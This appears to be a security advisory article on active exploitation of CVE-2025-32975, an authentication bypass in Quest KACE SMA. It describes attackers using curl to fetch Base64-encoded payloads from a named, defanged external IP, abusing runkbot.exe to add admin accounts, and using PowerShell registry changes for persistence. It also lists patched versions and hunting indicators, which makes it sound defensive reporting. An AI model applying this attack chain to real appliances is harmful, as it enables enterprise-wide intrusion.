Corporate networks are facing active exploitation of CVE-2025-32975, a critical authentication bypass vulnerability in the Quest KACE Systems Management Appliance (SMA), a popular platform for IT asset management and software deployment. According to telemetry from Arctic Wolf, malicious activity has been observed since the week of 9 March 2026, primarily against internet-exposed, unpatched KACE SMA instances.
What is CVE-2025-32975 in Quest KACE SMA?
The vulnerability CVE-2025-32975 is rated with the maximum CVSS base score of 10.0, reflecting its severity. It is an authentication bypass issue that allows an attacker to impersonate a legitimate user without valid credentials. In practice, this enables direct takeover of an administrative session and full control of the management appliance.
Once exploited, an attacker can access the KACE SMA web interface as an administrator, modify policies, deploy software and scripts to managed endpoints, and alter configuration across the environment. Because KACE SMA typically has broad reach into servers and workstations, compromise of a single appliance can quickly evolve into enterprise-wide compromise. Quest released patches addressing CVE-2025-32975 in May 2025.
How attackers are exploiting Quest KACE SMA in the wild
Arctic Wolf’s analysis indicates that threat actors are using CVE-2025-32975 to obtain administrative access and then execute remote commands on vulnerable appliances. One observed tactic involves the use of curl to download malicious components from an external server at 216.126.225[.]156, delivering payloads encoded as Base64 strings.
In this context, Base64 encoding is not encryption; it is used to obscure content and simplify transmission of binary data in text form. After decoding, the payloads may consist of scripts, trojan downloaders, or remote administration tools designed to maintain access, move laterally, and expand control across the network.
Post-exploitation: abuse of runkbot.exe and PowerShell for persistence
Following initial access, attackers have been observed creating additional administrator accounts by abusing the runkbot.exe process. This executable is a legitimate background component of the KACE SMA agent, responsible for running scripts and managing software installations on enrolled endpoints. Leveraging built-in service processes makes malicious activity harder to spot because it blends in with normal management operations.
Investigations have also revealed modifications to the Windows Registry via PowerShell scripts. Such registry changes are a common persistence technique, for example, by adding malware to autostart entries or weakening security settings. PowerShell remains a favored tool for many threat actors due to its deep integration with Windows, extensive automation capabilities, and the fact that it is typically allowed in enterprise environments.
Why IT management appliances like Quest KACE SMA are prime targets
Management platforms such as Quest KACE SMA occupy a high-trust position inside corporate infrastructure. They have visibility into large numbers of servers and endpoints and can push software, scripts, and configuration changes at scale. From an attacker’s perspective, compromising such a system provides an ideal “distribution hub” for malware and tools, enabling wide infection with minimal user interaction.
Historic incidents involving other management and monitoring platforms demonstrate this risk clearly: once an attacker gains privileged access to a centralized management tool, they can quickly turn it into an efficient mechanism for ransomware deployment, data exfiltration, or stealthy long‑term access. This is why authentication bypass vulnerabilities with admin takeover in these products routinely receive the highest CVSS scores, and why exposing their admin interfaces or APIs directly to the internet remains a critical misconfiguration.
Security recommendations for Quest KACE SMA customers
Patch vulnerable KACE SMA versions and minimize internet exposure
Administrators should immediately verify that their Quest KACE SMA deployment is running a version that includes the fix for CVE-2025-32975. Quest has addressed the issue in the following releases: 13.0.385, 13.1.81, 13.2.183, 14.0.341 (Patch 5), 14.1.101 (Patch 4). Any appliance on an earlier build should be upgraded or patched as a matter of urgency.
Equally important is to review the network exposure of KACE SMA. Direct internet access to the web interface or API should be disabled wherever possible, limiting access to internal network segments and, when remote access is required, to VPN-protected connections. Placing KACE SMA in a dedicated, well‑segmented network zone with strict firewall rules can significantly reduce the blast radius if the appliance is ever compromised.
Hunt for compromise and strengthen detection capabilities
Organizations using Quest KACE SMA should conduct targeted log reviews and threat hunting to identify potential compromise. Priority indicators include:
— unexpected logins with administrative accounts;
— creation of new administrator users without corresponding change tickets;
— outbound connections to 216.126.225[.]156 or other unfamiliar external IPs;
— unusual activity involving curl, PowerShell, or the runkbot.exe process.
Enhanced PowerShell logging (including script block and module logging), combined with EDR/XDR solutions, can improve detection of suspicious behavior patterns such as script-based lateral movement or persistence creation. Regular audits of privileged accounts, strict application of the principle of least privilege, robust patch management processes, and network segmentation are key measures to limit the success and impact of similar vulnerabilities in the future.
The current wave of attacks against Quest KACE SMA illustrates how quickly critical vulnerabilities in IT infrastructure management systems are weaponized by threat actors. Rapid patching, elimination of unnecessary internet exposure, continuous monitoring, and a tested incident response plan are no longer optional recommendations but essential elements of cyber resilience. Organizations that invest in these practices today are far better positioned to prevent the next critical or zero‑day vulnerability from turning into a major security incident.
